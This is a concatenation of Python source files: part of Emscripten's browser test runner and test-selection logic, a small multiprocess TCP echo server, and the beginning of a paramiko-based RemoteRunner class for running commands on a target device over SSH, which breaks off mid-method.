# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in engines and not self.is_wasm_backend():
engines = [SPIDERMONKEY_ENGINE]
else:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
    # Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
    def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
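# A minimal sketch (not part of the harness) of the client side of the protocol
# implemented by harness_server_func above: poll /check until the server hands
# out a test URL, then report a result back via /report_result. The port default
# matches the harness default below; the result value is a placeholder, and the
# real client is the browser harness page, not this Python function.
def example_harness_client(port=8888, result='0'):
  from urllib.request import urlopen
  reply = urlopen('http://localhost:%d/check' % port).read()
  if reply.startswith(b'COMMAND:'):
    # The server queued a test; a real client would now load this URL in the
    # browser and, once the test finishes, report its result to the server,
    # which forwards it to the waiting test runner.
    test_url = reply[len(b'COMMAND:'):].decode()
    print('would load: ' + test_url)
    urlopen('http://localhost:%d/report_result?%s' % (port, result))
  # b'(wait)' means no test is queued yet; the browser harness simply polls again.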
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdenticalUrlEncoded(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
self.run_process([EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
  shutil.copytree(source_dir, project_dir) # When debugging, it can be useful to comment this line out, along with the two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
      print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
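# The in-memory cache populated above maps
#   cache_name -> [(basename, file_contents_bytes), ...]
# and is what RunnerCore.get_library() consults before rebuilding a library.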
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
    print('Not all the JS engines in JS_ENGINES appear to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
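# Illustrative expectations for the parser above (the 'random' prefix is stripped
# by args_for_random_tests before this is called):
#   get_random_test_parameters('7')        -> (7, default_core_test_mode, core_test_modes)
#   get_random_test_parameters('other3')   -> (3, 'other', ['other'])
#   get_random_test_parameters('browser2') -> (2, 'browser', ['browser'])
#   get_random_test_parameters('')         -> (1, default_core_test_mode, core_test_modes)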
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
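# Worked example of the estimate above: with num_tests = 100 randomly-chosen
# tests, std = 0.5 / sqrt(100) = 0.05, so the reported threshold is
# 100 * (1 - 0.05) = 95.00% of the test suite.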
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
if not EMTEST_SAVE_DIR:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(2)
while True:
conn, addr = s.accept()
p = Process(target=handle_echo, args=(addr, conn))
p.daemon = True
p.start()
print("Started process ", p)
def handle_echo(addr, conn):
print("Connected by", addr)
full_data = b""
while True:
data = conn.recv(BUFFER_SIZE)
# print(data)
if not data: break
full_data += data
# conn.send(data)
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
#conn.close()
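# Illustrative client sketch (not part of the original server): send one message
# to the loopback address and read back the echo. The server only replies after
# the client half-closes its sending side, so we shutdown(SHUT_WR) before reading.
def echo_client(message=b"hello"):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(("127.0.0.1", PORT))
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)  # tell the server we are done sending
        reply = b""
        while True:
            data = s.recv(BUFFER_SIZE)
            if not data:
                break
            reply += data
    return reply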
if __name__ == "__main__":
main()
|
remote_runner.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import io
import logging
import sys
from threading import Thread
import paramiko
class RemoteRunner:
def __init__(self, ipaddress=None, username=None, password=None,
command=None, verbose=True, logfile=None,
timeout=None, ):
self.ipaddress = ipaddress
self.username = username
self.password = password
self.command = command
self.verbose = verbose
self.timeout = timeout
if logfile:
self.logfile = open(logfile, 'w')
else:
self.logfile = None
self.all = all
self.machine = None
self.ssh = None
self.buffer = None
def connect_ssh(self):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.print("connecting to target device at " + self.ipaddress)
self.ssh.connect(self.ipaddress, username=self.username, password=self.password)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.ssh:
self.ssh.close()
def close_ssh(self):
self.ssh.close()
def logstream(self, stream):
try:
while True:
out = stream.readline()
if out:
msg = out.rstrip('\n')
self.print(msg)
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### logstream exception: %s: %s" % (str(errorType), str(value))
self.print(msg)
def exec_remote_command(self, cmd):
self.print("remote: " + cmd)
self.buffer = io.StringIO()
try:
stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=self.timeout)
stdout_thread = Thread(target=self.logstream, args=(stdout,))
stderr_thread = Thread(target=self.logstream, args=(stderr,))
stdout_thread.start()
stderr_thread.start()
            stdout_thread.join()
            stderr_thread.join()
except:
errorType, value, traceback = sys.exc_info()
msg = "### exec_remote_command exception: %s: %s" % (str(errorType), str(value))
self.print(msg)
result = self.buffer.getvalue().split('\n')
self.buffer = None
return result
def print(self, output):
if self.verbose:
print(output)
if self.buffer:
self.buffer.write(output + "\n")
if self.logfile:
self.logfile.write(output + "\n")
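    # Note: run_command()/run_all() below also rely on attributes and helpers
    # (start_clean, publish_bits, target_dir, copy_files, cleanup, cluster) that
    # are not defined in this class; a caller is expected to provide them.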
def run_command(self):
output = []
try:
self.connect_ssh()
if self.start_clean:
self.clean_target()
self.publish_bits()
if self.command:
if self.target_dir:
self.exec_remote_command("cd {} && chmod u+x ./{}".format(
self.target_dir, self.command.split(" ")[0]))
output = self.exec_remote_command("cd {} && ./{}".format(
self.target_dir, self.command))
else:
output = self.exec_remote_command(self.command)
self.copy_files()
if self.cleanup:
self.clean_target()
self.close_ssh()
except:
errorType, value, traceback = sys.exc_info()
msg = "### run_command exception: %s: %s" % (str(errorType), str(value) + "\n" + str(traceback))
self.print(msg)
if self.buffer:
output = self.buffer.getvalue().split('\n')
output += [msg]
return output
def run_all(self):
for machine in self.cluster.get_all():
try:
